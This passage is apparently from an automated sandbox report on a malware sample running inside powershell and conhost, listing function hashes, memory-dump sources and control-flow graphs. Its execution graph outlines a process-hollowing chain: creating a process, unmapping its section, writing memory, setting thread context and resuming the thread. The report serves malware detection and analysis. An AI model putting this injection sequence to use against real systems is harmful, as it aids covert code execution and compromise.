                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 782ffa434146e8a01ecbcdcd1e419b9adcae5fc0863c9067df396e8d34547bec
                                          • Instruction ID: 4eb2b67abe35538625a172f04d1162596a24ba550c11e6c4409bf33609c08bb0
                                          • Opcode Fuzzy Hash: 782ffa434146e8a01ecbcdcd1e419b9adcae5fc0863c9067df396e8d34547bec
                                          • Instruction Fuzzy Hash: E8F1C230A08A498FDB94EF1DC485AA97BE1FF69301F5441A9D40DD729ACB75F882CBC1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C2825C Relevance: .3, Instructions: 337COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481946474.00007FF9F1C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1c20000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 50e0daed9258fdcfb451b667d837cd69f4fb09419139e85ab7a75439d5842a92
                                          • Instruction ID: 9b63db62618b0f9e862973679ed392a2083b92d061cc6b5a8ce8b3431cc28cbb
                                          • Opcode Fuzzy Hash: 50e0daed9258fdcfb451b667d837cd69f4fb09419139e85ab7a75439d5842a92
                                          • Instruction Fuzzy Hash: 36A1487290CB894FE755EB299C156B63BE0FF56320F1801BEE05DC71D3EA28AC568391
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1B57AF8 Relevance: .3, Instructions: 255COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481457964.00007FF9F1B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1b50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd804891815f9e8652ea4e84ee21e9ec57271a4754215a04ece0634d95cfc643
                                          • Instruction ID: e42a12f0efe08745b4bac41b8e24f764ff8e539ab54ec4db06ae5dd0c1dc48c0
                                          • Opcode Fuzzy Hash: bd804891815f9e8652ea4e84ee21e9ec57271a4754215a04ece0634d95cfc643
                                          • Instruction Fuzzy Hash: 6D11707180E7C58FD7478B344C695957FB0EF23211B4902DBD594CB0F7D6585848C7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1B51C59 Relevance: .2, Instructions: 168COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481457964.00007FF9F1B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1b50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 755b47dbec1437449d5a82276d3b788f08c2fb24fcc41ee4ec4265828a436f2a
                                          • Instruction ID: b7dbda2434e35a45ed2a434836e4c155f96c1b592d8606806d30b99036927ce5
                                          • Opcode Fuzzy Hash: 755b47dbec1437449d5a82276d3b788f08c2fb24fcc41ee4ec4265828a436f2a
                                          • Instruction Fuzzy Hash: 9B51083190CA498FD305DB18D454BA5B7E1FF85310F4846BAE05CC72DECF69A98587C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C24370 Relevance: .1, Instructions: 146COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481946474.00007FF9F1C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1c20000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b8f22fd9a831c898ccdccc9194af5c5460e7ecda4dc4ce41252cf3da7e16ced2
                                          • Instruction ID: 52e50c52a610a75a06dcbd30b201c2df68cfc402d23af33677b2378dd884bc13
                                          • Opcode Fuzzy Hash: b8f22fd9a831c898ccdccc9194af5c5460e7ecda4dc4ce41252cf3da7e16ced2
                                          • Instruction Fuzzy Hash: 64411332A0CA894FEBAAD72854517B87BD1EFA5720B6801FEC05EC71D3DA58BC4583C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1B57575 Relevance: .1, Instructions: 135COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481457964.00007FF9F1B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1b50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dd71693f573ee411f383d1db9fe8fe40a5aa4aa9b38d498d48c624bf98871c20
                                          • Instruction ID: 4084420a8075ac54c9e66829c07ba429a37e4ef945c93872c44daefbc359e209
                                          • Opcode Fuzzy Hash: dd71693f573ee411f383d1db9fe8fe40a5aa4aa9b38d498d48c624bf98871c20
                                          • Instruction Fuzzy Hash: FB31F87191CB888FDB58DF5C98066A97BE0FB59321F04426FE049C3292DB74A855CBC2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1B5804C Relevance: .1, Instructions: 102COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481457964.00007FF9F1B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1b50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d9e5840abae7962780ad1d1f32c7da210ab13cbbde0cad300b76486c6a06ea79
                                          • Instruction ID: d68e4a0493d73dc62b66327ce6835abd084e0a9dd38cdf6a3fdde7ae1b1f30e6
                                          • Opcode Fuzzy Hash: d9e5840abae7962780ad1d1f32c7da210ab13cbbde0cad300b76486c6a06ea79
                                          • Instruction Fuzzy Hash: 1121283090CB4C8FDB59DFAC984A7E97FE0EB56321F04416BD049C3156CB74A85ACB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C240CF Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481946474.00007FF9F1C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1c20000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 840b53a5d30fc9e8d0ec5778ad601eb57f95a1d5abf06124cafdb02c9a2fbffe
                                          • Instruction ID: c7304689334e9d28fea5c358bbb84262860e7a934c8c923b0b596d973a2a6b0a
                                          • Opcode Fuzzy Hash: 840b53a5d30fc9e8d0ec5778ad601eb57f95a1d5abf06124cafdb02c9a2fbffe
                                          • Instruction Fuzzy Hash: 1821DD22E0DA864FE7AADB58545137476D2EFB5310B7900B9C12EC72E3CE68F8848281
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C243BC Relevance: .1, Instructions: 62COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481946474.00007FF9F1C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1c20000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c78d59ab3a856f88c157e3b22803e6228723f2f94a5adfe0a2efe1e5ab821201
                                          • Instruction ID: 6d85f394c98c648894fd63e015c6496d159414e91b0aaecf601e59530e0f85ae
                                          • Opcode Fuzzy Hash: c78d59ab3a856f88c157e3b22803e6228723f2f94a5adfe0a2efe1e5ab821201
                                          • Instruction Fuzzy Hash: C111A032A0DA854FE7A6D71894517B87AD1EF65B20B6800BAD15ECB1D3CB48BC8042C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1B51775 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481457964.00007FF9F1B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1b50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 57c8e95e389048294af7b3b9936d9240bcb4c431421e216c408a86abe748e8e1
                                          • Instruction ID: 1d8270637d8a766f7110ea9933c5dbfb1604d4f466b05db25b899dd04119b816
                                          • Opcode Fuzzy Hash: 57c8e95e389048294af7b3b9936d9240bcb4c431421e216c408a86abe748e8e1
                                          • Instruction Fuzzy Hash: 4301447111CB088FD744EF0CE451AA6B7E0FB95364F50056EE58AC3695DB26E881CB45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1B5A108 Relevance: .0, Instructions: 39COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481457964.00007FF9F1B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1b50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 179a3c5a051657039cb3bfbee0abf2169113c517a1e4a41c736b13b1c326416a
                                          • Instruction ID: a1adff5caa1fd5a81f0d5921c16a87657c7a61e12282c7b5100bf742bb9caa74
                                          • Opcode Fuzzy Hash: 179a3c5a051657039cb3bfbee0abf2169113c517a1e4a41c736b13b1c326416a
                                          • Instruction Fuzzy Hash: 2EF0373276C6044FDB4CAA1CF4529B573D1EB99321B44056EE48BC2696D917F8428685
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:16.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:41
                                          Total number of Limit Nodes:3
                                          execution_graph 4408 27e764f9106 4409 27e764f9128 4408->4409 4410 27e764f9254 LoadLibraryA 4409->4410 4411 27e764f9269 4409->4411 4417 27e764f917c 4409->4417 4410->4409 4411->4417 4419 27e764f931d 4411->4419 4427 27e764f82a2 4411->4427 4413 27e764f92f3 4414 27e764f92f7 4413->4414 4420 27e764f83ba LoadLibraryA 4413->4420 4414->4413 4414->4417 4418 27e764f930c 4418->4417 4418->4419 4419->4417 4422 27e764f8eb2 4419->4422 4421 27e764f83df 4420->4421 4421->4418 4423 27e764f8ef2 CLRCreateInstance 4422->4423 4426 27e764f8f0b 4422->4426 4423->4426 4424 27e764f90b2 4424->4417 4425 27e764f90a9 SafeArrayDestroy 4425->4424 4426->4424 4426->4425 4426->4426 4428 27e764f82af LoadLibraryA 4427->4428 4429 27e764f82c7 4428->4429 4429->4413 4430 7ff9f1c06c00 4432 7ff9f1c06c09 4430->4432 4431 7ff9f1c06be3 4432->4431 4433 7ff9f1c06c70 SetThreadContext 4432->4433 4434 7ff9f1c06caa 4433->4434 4435 7ff9f1c06b00 4436 7ff9f1c06b09 WriteProcessMemory 4435->4436 4438 7ff9f1c06bd7 4436->4438 4443 7ff9f1c070d0 4444 7ff9f1c070d3 ResumeThread 4443->4444 4446 7ff9f1c07194 4444->4446 4447 7ff9f1c064d0 4449 7ff9f1c064d9 CreateProcessA 4447->4449 4450 7ff9f1c06821 4449->4450 4451 7ff9f1c0690e 4452 7ff9f1c06913 NtUnmapViewOfSection 4451->4452 4454 7ff9f1c069da 4452->4454 4439 7ff9f1c071bc 4440 7ff9f1c071c5 FindCloseChangeNotification 4439->4440 4442 7ff9f1c07264 4440->4442 4455 27e764f82af LoadLibraryA 4456 27e764f82c7 4455->4456

                                          Executed Functions

                                          Function 0000027E764F9106 Relevance: 1.9, APIs: 1, Instructions: 378libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 299 27e764f9106-27e764f9157 call 27e764fa2de * 3 306 27e764f9189 299->306 307 27e764f9159-27e764f915c 299->307 309 27e764f918c-27e764f919d 306->309 307->306 308 27e764f915e-27e764f9161 307->308 308->306 310 27e764f9163-27e764f917a 308->310 312 27e764f917c-27e764f9183 310->312 313 27e764f919e-27e764f91c9 call 27e764fa85e call 27e764fa87e 310->313 312->306 315 27e764f9185 312->315 319 27e764f91cb-27e764f9200 call 27e764fa492 call 27e764fa352 313->319 320 27e764f9206-27e764f921d call 27e764fa2de 313->320 315->306 319->320 329 27e764f9462-27e764f9473 319->329 320->306 326 27e764f9223-27e764f9224 320->326 328 27e764f922a-27e764f9230 326->328 330 27e764f9269-27e764f9273 328->330 331 27e764f9232 328->331 335 27e764f94a6-27e764f94c7 call 27e764fa87e 329->335 336 27e764f9475-27e764f947f 329->336 333 27e764f9275-27e764f9290 call 27e764fa2de 330->333 334 27e764f92a1-27e764f92aa 330->334 332 27e764f9234-27e764f9236 331->332 337 27e764f9238-27e764f923e 332->337 338 27e764f9250-27e764f9252 332->338 333->329 354 27e764f9296-27e764f929f 333->354 341 27e764f92ac-27e764f92b6 call 27e764f84d2 334->341 342 27e764f92c5-27e764f92c8 334->342 362 27e764f94cd-27e764f94cf 335->362 363 27e764f94c9 335->363 336->335 343 27e764f9481-27e764f949f call 27e764fa87e 336->343 337->338 346 27e764f9240-27e764f924e 337->346 338->330 347 27e764f9254-27e764f9267 LoadLibraryA 338->347 341->329 359 27e764f92bc-27e764f92c3 341->359 342->329 344 27e764f92ce-27e764f92d8 342->344 343->335 351 27e764f92da-27e764f92db 344->351 352 27e764f92e2-27e764f92e9 344->352 346->332 346->338 347->328 351->352 356 27e764f931d-27e764f9321 352->356 357 27e764f92eb-27e764f92ec 352->357 354->333 354->334 364 27e764f93fd-27e764f9405 356->364 365 27e764f9327-27e764f9349 356->365 361 27e764f92ee call 27e764f82a2 357->361 359->352 366 27e764f92f3-27e764f92f5 361->366 362->309 363->362 367 27e764f9457-27e764f945d call 27e764f990e 364->367 368 27e764f9407-27e764f940d 364->368 365->329 378 27e764f934f-27e764f9369 call 27e764fa85e 365->378 369 27e764f92f7-27e764f92fe 366->369 370 27e764f9304-27e764f9307 call 27e764f83ba 366->370 367->329 373 27e764f9424-27e764f9436 call 27e764f8eb2 368->373 374 27e764f940f-27e764f9415 368->374 369->329 369->370 382 27e764f930c-27e764f930e 370->382 385 27e764f9448-27e764f9455 call 27e764f8952 373->385 386 27e764f9438-27e764f9443 call 27e764f94d6 373->386 374->329 375 27e764f9417-27e764f9422 call 27e764f9d6a 374->375 375->329 388 27e764f936b-27e764f936e 378->388 389 27e764f9389-27e764f93b2 378->389 382->356 387 27e764f9310-27e764f9317 382->387 385->329 386->385 387->329 387->356 388->364 392 27e764f9374-27e764f9387 call 27e764fa5e2 388->392 389->329 397 27e764f93b8-27e764f93f8 389->397 398 27e764f93fa-27e764f93fb 392->398 397->329 397->398 398->364
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.662884382.0000027E76320000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000027E76320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_27e76320000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 4981fcbef524a62066d347c258a4edd11de724e6c9263cf9e55c3275a19a809e
                                          • Instruction ID: dda2a228d0c9bdcddd1b6a8184d5f843b5aaf9ac11b3f5126b1e35dc133a2f0a
                                          • Opcode Fuzzy Hash: 4981fcbef524a62066d347c258a4edd11de724e6c9263cf9e55c3275a19a809e
                                          • Instruction Fuzzy Hash: B5C1A87031C9059BEF5DDA28C88A7F9F3D5FB9C306F1901A9D45EC7186EB21DC428A91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C0690E Relevance: 1.6, APIs: 1, Instructions: 116nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 661 7ff9f1c0690e-7ff9f1c06911 662 7ff9f1c06913-7ff9f1c06949 661->662 662->662 663 7ff9f1c0694b-7ff9f1c069d8 NtUnmapViewOfSection 662->663 667 7ff9f1c069e0-7ff9f1c069fc 663->667 668 7ff9f1c069da 663->668 668->667
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.676849181.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID: SectionUnmapView
                                          • String ID:
                                          • API String ID: 498011366-0
                                          • Opcode ID: 7b4211be23b94be085fd443075647a4a5d8041b86a00cf7a3089ba44f9935114
                                          • Instruction ID: 105ee5b77823cc2b2da622d751e31f9d7331737060f5e411ccf0f00ce503e4e6
                                          • Opcode Fuzzy Hash: 7b4211be23b94be085fd443075647a4a5d8041b86a00cf7a3089ba44f9935114
                                          • Instruction Fuzzy Hash: 8931E53090C7888FDB5ADF68C8457E97FE0EF57320F18429FD089C7196D665A846CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0000027E764F8EB2 Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.662884382.0000027E76320000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000027E76320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_27e76320000_conhost.jbxd
                                          Similarity
                                          • API ID: ArrayCreateDestroyInstanceSafe
                                          • String ID:
                                          • API String ID: 3902440814-0
                                          • Opcode ID: 3d7ce29a3494d90a8d6d00d3dac55982f43ec50322358874c395b9073376e0d7
                                          • Instruction ID: 2b8d971abc063ef6174d84a50fae2cd1c09a1950e01f462cef93f86a717d4b1e
                                          • Opcode Fuzzy Hash: 3d7ce29a3494d90a8d6d00d3dac55982f43ec50322358874c395b9073376e0d7
                                          • Instruction Fuzzy Hash: 91817030208A088FDB68EF28C889BE6B7E1FF99305F044A6DD49FC7151EB31E9458B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C064D0 Relevance: 1.9, APIs: 1, Instructions: 385processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 257 7ff9f1c064d0-7ff9f1c064d7 258 7ff9f1c064e2-7ff9f1c065a0 257->258 259 7ff9f1c064d9-7ff9f1c064e1 257->259 262 7ff9f1c065a2-7ff9f1c065b1 258->262 263 7ff9f1c065fe-7ff9f1c06630 258->263 259->258 262->263 264 7ff9f1c065b3-7ff9f1c065b6 262->264 270 7ff9f1c06632-7ff9f1c06641 263->270 271 7ff9f1c0668e-7ff9f1c066e6 263->271 265 7ff9f1c065b8-7ff9f1c065cb 264->265 266 7ff9f1c065f0-7ff9f1c065f8 264->266 268 7ff9f1c065cf-7ff9f1c065e2 265->268 269 7ff9f1c065cd 265->269 266->263 268->268 272 7ff9f1c065e4-7ff9f1c065ec 268->272 269->268 270->271 273 7ff9f1c06643-7ff9f1c06646 270->273 277 7ff9f1c066e8-7ff9f1c066f7 271->277 278 7ff9f1c06744-7ff9f1c0676e 271->278 272->266 275 7ff9f1c06648-7ff9f1c0665b 273->275 276 7ff9f1c06680-7ff9f1c06688 273->276 279 7ff9f1c0665f-7ff9f1c06672 275->279 280 7ff9f1c0665d 275->280 276->271 277->278 281 7ff9f1c066f9-7ff9f1c066fc 277->281 288 7ff9f1c06770-7ff9f1c06778 278->288 289 7ff9f1c0677c-7ff9f1c0678b 278->289 279->279 282 7ff9f1c06674-7ff9f1c0667c 279->282 280->279 283 7ff9f1c06736-7ff9f1c0673e 281->283 284 7ff9f1c066fe-7ff9f1c06711 281->284 282->276 283->278 286 7ff9f1c06715-7ff9f1c06728 284->286 287 7ff9f1c06713 284->287 286->286 290 7ff9f1c0672a-7ff9f1c06732 286->290 287->286 288->289 291 7ff9f1c06798-7ff9f1c0681f CreateProcessA 289->291 292 7ff9f1c0678d-7ff9f1c06795 289->292 290->283 293 7ff9f1c06827-7ff9f1c06864 call 7ff9f1c06880 291->293 294 7ff9f1c06821 291->294 292->291 297 7ff9f1c06866 293->297 298 7ff9f1c0686b-7ff9f1c0687f 293->298 294->293 297->298
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.676849181.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 12e3a04df9cc3d0d8b13f147fad88ed055a4f75051d413c91700522ba2e4678e
                                          • Instruction ID: dc1d256dd028ba9dfa1d24603e784b97b424b33ef3aa498ef827442acc1b824b
                                          • Opcode Fuzzy Hash: 12e3a04df9cc3d0d8b13f147fad88ed055a4f75051d413c91700522ba2e4678e
                                          • Instruction Fuzzy Hash: 9BC1C670918A8D8FEB68DF2CDC467E977D0FB59310F10422AE85DC7291DB74A9858BC2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C06C00 Relevance: 1.6, APIs: 1, Instructions: 126threadinjectionCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 531 7ff9f1c06c00-7ff9f1c06c07 532 7ff9f1c06c12-7ff9f1c06c19 531->532 533 7ff9f1c06c09-7ff9f1c06c11 531->533 534 7ff9f1c06be3-7ff9f1c06bfa 532->534 535 7ff9f1c06c1b-7ff9f1c06ca8 SetThreadContext 532->535 533->532 539 7ff9f1c06cb0-7ff9f1c06cd7 535->539 540 7ff9f1c06caa 535->540 540->539
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.676849181.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID:
                                          • API String ID: 1591575202-0
                                          • Opcode ID: 87045bbf9e9fd6d5d475c4d3ccd640ff1d4fc1fa48d0b94c592fd7e48bcfadd7
                                          • Instruction ID: fbc01e9ed564a61c5281e6f85370e036a546955d5ee3369f1ae0bfbf5e160e17
                                          • Opcode Fuzzy Hash: 87045bbf9e9fd6d5d475c4d3ccd640ff1d4fc1fa48d0b94c592fd7e48bcfadd7
                                          • Instruction Fuzzy Hash: F531E531A0C6088FEB58DF58D8467F9BBE0EB96321F14416FD08DC3192DA75A8968B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C06B00 Relevance: 1.6, APIs: 1, Instructions: 126injectionCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 520 7ff9f1c06b00-7ff9f1c06b07 521 7ff9f1c06b12-7ff9f1c06b88 520->521 522 7ff9f1c06b09-7ff9f1c06b11 520->522 526 7ff9f1c06b92-7ff9f1c06bd5 WriteProcessMemory 521->526 527 7ff9f1c06b8a-7ff9f1c06b8f 521->527 522->521 528 7ff9f1c06bd7 526->528 529 7ff9f1c06bdd-7ff9f1c06bfa 526->529 527->526 528->529
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.676849181.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 5a2d08dbff7811b729ba0c80f514e8b0c63b8f74a41db581e85ac411c8bd8c5f
                                          • Instruction ID: b92cdae1b0cca36e979e70d58ae5ebd81684e4ba594853d6a336e88e7a0630f1
                                          • Opcode Fuzzy Hash: 5a2d08dbff7811b729ba0c80f514e8b0c63b8f74a41db581e85ac411c8bd8c5f
                                          • Instruction Fuzzy Hash: 0B31E37190CA5C8FDB19DF5C98497F9BBE0FB5A321F04426FD089D3692CB70A8468B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0000027E764F83BA Relevance: 1.6, APIs: 1, Instructions: 125libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 541 27e764f83ba-27e764f83dd LoadLibraryA 542 27e764f83e9-27e764f83fc 541->542 543 27e764f83df-27e764f83e4 541->543 546 27e764f8402-27e764f8413 542->546 547 27e764f84be 542->547 544 27e764f84c0-27e764f84d0 543->544 546->547 548 27e764f8419-27e764f8431 546->548 547->544 548->547 550 27e764f8437-27e764f846b call 27e764fa85e 548->550 550->547 555 27e764f846d-27e764f847e 550->555 555->547 556 27e764f8480-27e764f8497 555->556 556->547 558 27e764f8499-27e764f84b9 call 27e764fa85e 556->558 558->543
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.662884382.0000027E76320000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000027E76320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_27e76320000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                          • Instruction ID: e91b55f4628f942c9ed6ae405c7a2da772ad12f531f8131a94b7744fe6478b98
                                          • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                          • Instruction Fuzzy Hash: 3531963130CA084FEF58AA68DC4A2AAB3E5F7D8311F051159EC4FD7286EE64DD4687D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C070D0 Relevance: 1.6, APIs: 1, Instructions: 119threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 650 7ff9f1c070d0 651 7ff9f1c070d3-7ff9f1c07109 650->651 655 7ff9f1c0710b-7ff9f1c07192 ResumeThread 651->655 659 7ff9f1c07194 655->659 660 7ff9f1c0719a-7ff9f1c071b6 655->660 659->660
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.676849181.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: ca399a048fafa4a4e59a9e056c4343ff41f843a3effc1775aeb189256371beff
                                          • Instruction ID: 93d0d6bf854d753775d0b06c469868742aef5ae4aa36a83799c8f8f9b1fcc4cd
                                          • Opcode Fuzzy Hash: ca399a048fafa4a4e59a9e056c4343ff41f843a3effc1775aeb189256371beff
                                          • Instruction Fuzzy Hash: 4331CF3190CA488FDB59EB68D8067F97BE0EF56320F08416ED04DC36A2CB646856CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0000027E764F82AF Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 669 27e764f82af-27e764f82c5 LoadLibraryA 670 27e764f82c7-27e764f82cc 669->670 671 27e764f82d1-27e764f82e4 669->671 672 27e764f83a8-27e764f83b8 670->672 674 27e764f82ea-27e764f82fb 671->674 675 27e764f83a6 671->675 674->675 676 27e764f8301-27e764f8319 674->676 675->672 676->675 678 27e764f831f-27e764f8353 call 27e764fa85e 676->678 678->675 683 27e764f8355-27e764f8366 678->683 683->675 684 27e764f8368-27e764f837f 683->684 684->675 686 27e764f8381-27e764f83a1 call 27e764fa85e 684->686 686->670
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.662884382.0000027E76320000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000027E76320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_27e76320000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                          • Instruction ID: 5b9fe5af969d421a32c70b163cff9df11e52906cee555d4729d001c0779ad6e1
                                          • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
